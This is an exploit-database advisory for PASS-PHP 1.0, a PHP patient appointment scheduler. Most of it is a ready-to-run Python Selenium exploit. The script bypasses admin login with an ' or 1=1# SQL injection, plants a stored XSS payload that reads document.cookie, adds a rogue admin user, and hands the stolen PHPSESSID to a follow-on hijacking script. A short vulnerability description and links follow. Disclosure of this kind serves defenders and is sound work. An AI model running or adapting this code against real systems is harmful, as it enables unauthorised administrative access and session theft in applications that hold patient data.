PASS-PHP 1.0 SQL Injection / Cross Site Scripting

2021.09.28
Credit: nu11secur1ty
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
CWE-79

### Exploit Title: PASS-PHP (by: oretnom23 ) v1.0 is vulnerable to remote SqL-Injection bypass Authentication, XSS-Stored and PHPSESSID Hijacking. ### Author: nu11secur1ty ### Testing and Debugging: nu11secur1ty ### Date: 09.24.2021 ### Vendor: https://www.sourcecodester.com/user/257130/activity ### Link: https://www.sourcecodester.com/php/14928/patient-appointment-scheduler-system-using-php-free-source-code.html ### CVE: CVE-nu11-06-092421 [+] Exploit Source: #!/usr/bin/python3 # Author: @nu11secur1ty # Debug and Developement: @nu11secur1ty # CVE-nu11-06-092421 from selenium import webdriver import time import os from colorama import init, Fore, Back, Style init(convert=True) import requests #enter the link to the website you want to automate login. website_link="http://localhost/scheduler/admin/login.php" #enter your login username username="nu11secur1ty' or 1=1#" #enter your login password password="nu11secur1ty' or 1=1#" #enter the element for username input field element_for_username="username" #enter the element for password input field element_for_password="password" browser = webdriver.Chrome() browser.get((website_link)) try: username_element = browser.find_element_by_name(element_for_username) username_element.send_keys(username) password_element = browser.find_element_by_name(element_for_password) password_element.send_keys(password) browser.maximize_window() time.sleep(1) browser.execute_script("document.querySelector('[class=\"btn btn-primary btn-block\"]').click()") time.sleep(1) exploit_link="http://localhost/scheduler/admin/?page=user/manage_user" browser.get((exploit_link)) time.sleep(3) browser.execute_script("document.querySelector('[name=\"firstname\"]').value=\"<script>alert(document.cookie)</script>\"") browser.execute_script("document.querySelector('[name=\"lastname\"]').value=\"<script>alert(document.cookie)</script>\"") browser.execute_script("document.querySelector('[name=\"username\"]').value=\"PWNED_\"") browser.execute_script("document.querySelector('[name=\"password\"]').value=\"tralala_\"") time.sleep(1) browser.execute_script("document.querySelector('[class=\"btn btn-sm btn-primary mr-2\"]').click()") coockie=browser.execute_script("return document.cookie") coockie=coockie.split("=")[1] print(coockie) browser.close() print(Fore.YELLOW +"Please wait for PoC to hijacking the PHPSESSID...\n") print(Style.RESET_ALL) time.sleep(7) os.system("python PWNPHPSESSID.py " + coockie) print(Fore.GREEN +"The payload for CVE-nu11-06 is deployed your admin account is PWNED...\n") print(Fore.RED +"Your Cookie: PHPSESSID is hijacked and we have another bypass login...\n") print(Style.RESET_ALL) except Exception: #### This exception occurs if the element are not found in the webpage. print("Some error occured :(") ------------------------------------------------------------------ ### Description: The PASS-PHP (by: oretnom23 ) v1.0 is vulnerable to remote SqL-Injection bypass Authentication, XSS-Stored and PHPSESSID Hijacking. The vulnerable app: to remote SqL - injection bypass Authentication is "login.php", with parameters: "username" and "password". After the successful PWNED of the credentials for the admin account, the malicious user can be storing an XSS payload, whit who can take the active PHPSESSID every time when he wants to log in to the system with an admin account by using this exploit. ------------------------------------------------------------------- ### BR - [+] @nu11secur1ty System Administrator - Infrastructure and Penetration Testing Engineer ------------------------------------------------------------------- ### Reproduce: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/CVE-nu11-06-092421 ### Proof: https://streamable.com/1o87sl ### BR nu11secur1ty -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://www.exploit-db.com/ https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top